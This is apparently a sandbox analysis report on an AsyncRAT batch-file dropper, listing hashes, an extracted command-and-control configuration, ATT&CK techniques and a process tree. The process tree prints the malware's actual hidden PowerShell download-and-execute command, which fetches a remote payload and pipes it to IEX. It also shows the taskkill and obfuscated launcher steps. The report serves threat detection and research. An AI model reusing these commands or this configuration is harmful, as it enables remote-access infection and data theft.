asyncrat | 5dee2d0dd4d3eee97c372b6a8dbd3d3042d24b9483addfa9f8786617a88e268b

Analysis

max time kernel
128s
max time network
145s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
26/11/2024, 02:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5dee2d0dd4d3eee97c372b6a8dbd3d3042d24b9483addfa9f8786617a88e268b.bat
Size

11KB
MD5

4527c576f1af0580c8d96ac23c8f761c
SHA1

dac3bf00eeb34c9c1d9dca63973f2e04da045383
SHA256

5dee2d0dd4d3eee97c372b6a8dbd3d3042d24b9483addfa9f8786617a88e268b
SHA512

7afacd9324fd02c60e927c71d8c4c6b3317984869224da2e6311a4a5963ebb74615ada91af129f9083d771dc069b4578c895c42f8d9154e814e94f8cc28361b9
SSDEEP

192:kffffffffffffffffffffhffffffffffffffffffffQv/sfffffffffffffffffZ:kffffffffffffffffffffhfffffffffT

Score

10^/10

asyncrat ducksex discovery execution rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg

Extracted

Family

asyncrat

Version

| CRACKED BY DEXTER-LY

Botnet

ducksex

ducksex.ddnsfree.com:6161

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Blocklisted process makes network request 3 IoCs

flow	pid	Process
8	1200	powershell.exe
23	1200	powershell.exe
25	1200	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1200	powershell.exe
3052	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	WScript.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
22	ipinfo.io
23	ipinfo.io

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3052 set thread context of 2640	3052	powershell.exe	112

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe

Kills process with taskkill 10 IoCs

evasion

pid	Process
2012	taskkill.exe
2148	taskkill.exe
2936	taskkill.exe
392	taskkill.exe
3896	taskkill.exe
3584	taskkill.exe
3060	taskkill.exe
1564	taskkill.exe
3952	taskkill.exe
3484	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
1200	powershell.exe
1200	powershell.exe
3052	powershell.exe
3052	powershell.exe
2640	aspnet_compiler.exe

Suspicious use of AdjustPrivilegeToken 34 IoCs

description	pid	Process
Token: SeDebugPrivilege	1200	powershell.exe
Token: SeDebugPrivilege	2012	taskkill.exe
Token: SeDebugPrivilege	3584	taskkill.exe
Token: SeDebugPrivilege	3060	taskkill.exe
Token: SeDebugPrivilege	1564	taskkill.exe
Token: SeDebugPrivilege	2148	taskkill.exe
Token: SeDebugPrivilege	2936	taskkill.exe
Token: SeDebugPrivilege	3952	taskkill.exe
Token: SeDebugPrivilege	392	taskkill.exe
Token: SeDebugPrivilege	3896	taskkill.exe
Token: SeDebugPrivilege	3484	taskkill.exe
Token: SeDebugPrivilege	3052	powershell.exe
Token: SeIncreaseQuotaPrivilege	1200	powershell.exe
Token: SeSecurityPrivilege	1200	powershell.exe
Token: SeTakeOwnershipPrivilege	1200	powershell.exe
Token: SeLoadDriverPrivilege	1200	powershell.exe
Token: SeSystemProfilePrivilege	1200	powershell.exe
Token: SeSystemtimePrivilege	1200	powershell.exe
Token: SeProfSingleProcessPrivilege	1200	powershell.exe
Token: SeIncBasePriorityPrivilege	1200	powershell.exe
Token: SeCreatePagefilePrivilege	1200	powershell.exe
Token: SeBackupPrivilege	1200	powershell.exe
Token: SeRestorePrivilege	1200	powershell.exe
Token: SeShutdownPrivilege	1200	powershell.exe
Token: SeDebugPrivilege	1200	powershell.exe
Token: SeSystemEnvironmentPrivilege	1200	powershell.exe
Token: SeRemoteShutdownPrivilege	1200	powershell.exe
Token: SeUndockPrivilege	1200	powershell.exe
Token: SeManageVolumePrivilege	1200	powershell.exe
Token: 33	1200	powershell.exe
Token: 34	1200	powershell.exe
Token: 35	1200	powershell.exe
Token: 36	1200	powershell.exe
Token: SeDebugPrivilege	2640	aspnet_compiler.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2640	aspnet_compiler.exe

Suspicious use of WriteProcessMemory 38 IoCs

description	pid	Process	procid_target
PID 5048 wrote to memory of 3116	5048	cmd.exe	84
PID 5048 wrote to memory of 3116	5048	cmd.exe	84
PID 3116 wrote to memory of 1200	3116	cmd.exe	85
PID 3116 wrote to memory of 1200	3116	cmd.exe	85
PID 1200 wrote to memory of 2012	1200	powershell.exe	86
PID 1200 wrote to memory of 2012	1200	powershell.exe	86
PID 1200 wrote to memory of 3584	1200	powershell.exe	88
PID 1200 wrote to memory of 3584	1200	powershell.exe	88
PID 1200 wrote to memory of 3060	1200	powershell.exe	89
PID 1200 wrote to memory of 3060	1200	powershell.exe	89
PID 1200 wrote to memory of 1564	1200	powershell.exe	90
PID 1200 wrote to memory of 1564	1200	powershell.exe	90
PID 1200 wrote to memory of 2148	1200	powershell.exe	91
PID 1200 wrote to memory of 2148	1200	powershell.exe	91
PID 1200 wrote to memory of 2936	1200	powershell.exe	92
PID 1200 wrote to memory of 2936	1200	powershell.exe	92
PID 1200 wrote to memory of 3952	1200	powershell.exe	93
PID 1200 wrote to memory of 3952	1200	powershell.exe	93
PID 1200 wrote to memory of 392	1200	powershell.exe	94
PID 1200 wrote to memory of 392	1200	powershell.exe	94
PID 1200 wrote to memory of 3896	1200	powershell.exe	95
PID 1200 wrote to memory of 3896	1200	powershell.exe	95
PID 1200 wrote to memory of 3484	1200	powershell.exe	96
PID 1200 wrote to memory of 3484	1200	powershell.exe	96
PID 1200 wrote to memory of 2340	1200	powershell.exe	108
PID 1200 wrote to memory of 2340	1200	powershell.exe	108
PID 2340 wrote to memory of 1172	2340	WScript.exe	109
PID 2340 wrote to memory of 1172	2340	WScript.exe	109
PID 1172 wrote to memory of 3052	1172	cmd.exe	111
PID 1172 wrote to memory of 3052	1172	cmd.exe	111
PID 3052 wrote to memory of 2640	3052	powershell.exe	112
PID 3052 wrote to memory of 2640	3052	powershell.exe	112
PID 3052 wrote to memory of 2640	3052	powershell.exe	112
PID 3052 wrote to memory of 2640	3052	powershell.exe	112
PID 3052 wrote to memory of 2640	3052	powershell.exe	112
PID 3052 wrote to memory of 2640	3052	powershell.exe	112
PID 3052 wrote to memory of 2640	3052	powershell.exe	112
PID 3052 wrote to memory of 2640	3052	powershell.exe	112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\5dee2d0dd4d3eee97c372b6a8dbd3d3042d24b9483addfa9f8786617a88e268b.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:5048
- C:\Windows\system32\cmd.exe
  CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3116
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1200
  - - C:\Windows\system32\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /IM CCleanerBrowser.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2012
  - - C:\Windows\system32\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /IM aspnet_regbrowsers.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3584
  - - C:\Windows\system32\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /IM aspnet_compiler.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3060
  - - C:\Windows\system32\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /IM AppLaunch.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1564
  - - C:\Windows\system32\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /IM InstallUtil.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2148
  - - C:\Windows\system32\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /IM jsc.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2936
  - - C:\Windows\system32\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /IM MSBuild.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3952
  - - C:\Windows\system32\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /IM RegAsm.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:392
  - - C:\Windows\system32\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /IM cvtres.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3896
  - - C:\Windows\system32\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /IM RegSvcs.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3484
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\MJMDVSAJFXR.vbs"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:2340
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\AXAGFIIEZBBS.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1172
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\AMRKKUAMRKKsAMRKKeAMRKKrAMRKKs\PAMRKKuAMRKKbAMRKKlAMRKKiAMRKKc\LMKGJHPBNG.ps1'.replace('AMRKK','')"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3052
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:2640

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\WindowsHost\MJMDVSAJFXR.vbs

Filesize
203B

MD5
48c375c039c9fe2017af2e593d3fa715

SHA1
684cd6086ba8982e1d9e37fa8de48a1cbee37838

SHA256
75f0028ea10f4ed9120e1f39ed5cac7d9406f33c38d753cab48e35c2d1023858

SHA512
a86bd0caffe36e28f122ead39f87f70a837d1c3588fb75510bcfe82a1d49978cf0927e5d29249a82a0701ff6938b1a4f7e97756bb3579b4ce9c1979c1de879e5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
614f88cf39eb3223246afec4bf1463b4

SHA1
74d738ee6fdada75ac1ef1645073005e3f6b6cfb

SHA256
021636a793f57f23b16356c5b84fdf0122fdcadfaba305e4df4654bfbfa442bd

SHA512
84a7151e0471e659699a15c25d9063af1975e79bb5f23de6b3bc0d3b96cd161d70ad35f6acdbc8123b38bac9918df8b202bd6f1f4ca8061919074973e6063a77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
2KB

MD5
1f99e81cf5b5b213bfcbc5ee74d7890a

SHA1
d1de842d7a6c6f17bf73e00daa4216c94d3de0bd

SHA256
df27c38713af235f08f7fb32a9d6d4bc9760446523998bdd5d6cef18c35b4f36

SHA512
1e091e69a19a23ac8edd2eddf489cfb7ce7507e8f9c973e1f2e9c6c177d56960648a30bddb004084e8554eb68cd59d2b037af83e7c0e0d82f7282c721b8eafb7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1ewrjaj4.pqh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\AXAGFIIEZBBS.bat

Filesize
161B

MD5
65774b43ed7213533bdbaacc392de387

SHA1
d092142ccc5b88899da0091806d5249ac8d2ea04

SHA256
7c546286995ac2acaf515d4105ffdb18f4fd6f69b1d7eba583251b58532ef61d

SHA512
0b666036c54d77fccba4f77002fbca7fa43e30e73d7f67aeedf628db81a442d0955b191475f670ea4e736cfb0e67a6e120ccff17cc517ab7d6a073f2ecc7cedf

Download Submit
C:\Users\Public\LMKGJHPBNG.ps1

Filesize
249KB

MD5
33b6c435bdbbec12ae8cba21eb6d105f

SHA1
41d43dc4ec1187e6120f26158e074e39475b0815

SHA256
d4f4d3196d92b306f65ba4f1f90ec73403803530a58196b48db38210e3e3047d

SHA512
8b11308f7e16dc54e1559591d2d741f0a53d0a90c7ddb33bc817d15edcdc46dc4ebedd121925da4c791d7bb8b0a6a74334f63253f6fc3af453765f62826e4a4f

Download Submit
memory/1200-16-0x00007FFB25BC3000-0x00007FFB25BC5000-memory.dmp

Filesize
8KB

Download
memory/1200-40-0x000001DEA6A00000-0x000001DEA6BC2000-memory.dmp

Filesize
1.8MB

Download
memory/1200-19-0x00007FFB25BC0000-0x00007FFB26681000-memory.dmp

Filesize
10.8MB

Download
memory/1200-20-0x00007FFB25BC0000-0x00007FFB26681000-memory.dmp

Filesize
10.8MB

Download
memory/1200-0-0x00007FFB25BC3000-0x00007FFB25BC5000-memory.dmp

Filesize
8KB

Download
memory/1200-13-0x00007FFB25BC0000-0x00007FFB26681000-memory.dmp

Filesize
10.8MB

Download
memory/1200-12-0x00007FFB25BC0000-0x00007FFB26681000-memory.dmp

Filesize
10.8MB

Download
memory/1200-49-0x00007FFB25BC0000-0x00007FFB26681000-memory.dmp

Filesize
10.8MB

Download
memory/1200-10-0x000001DEA6300000-0x000001DEA6322000-memory.dmp

Filesize
136KB

Download
memory/1200-18-0x00007FFB25BC0000-0x00007FFB26681000-memory.dmp

Filesize
10.8MB

Download
memory/1200-41-0x000001DEA7100000-0x000001DEA7628000-memory.dmp

Filesize
5.2MB

Download
memory/1200-42-0x000001DEA6880000-0x000001DEA68AA000-memory.dmp

Filesize
168KB

Download
memory/1200-43-0x000001DEA6880000-0x000001DEA68A4000-memory.dmp

Filesize
144KB

Download
memory/1200-11-0x00007FFB25BC0000-0x00007FFB26681000-memory.dmp

Filesize
10.8MB

Download
memory/2640-37-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/2640-50-0x0000000005C80000-0x0000000006224000-memory.dmp

Filesize
5.6MB

Download
memory/2640-51-0x00000000058C0000-0x0000000005952000-memory.dmp

Filesize
584KB

Download
memory/2640-52-0x00000000058B0000-0x00000000058BA000-memory.dmp

Filesize
40KB

Download
memory/3052-36-0x000002A021980000-0x000002A02199A000-memory.dmp

Filesize
104KB

Download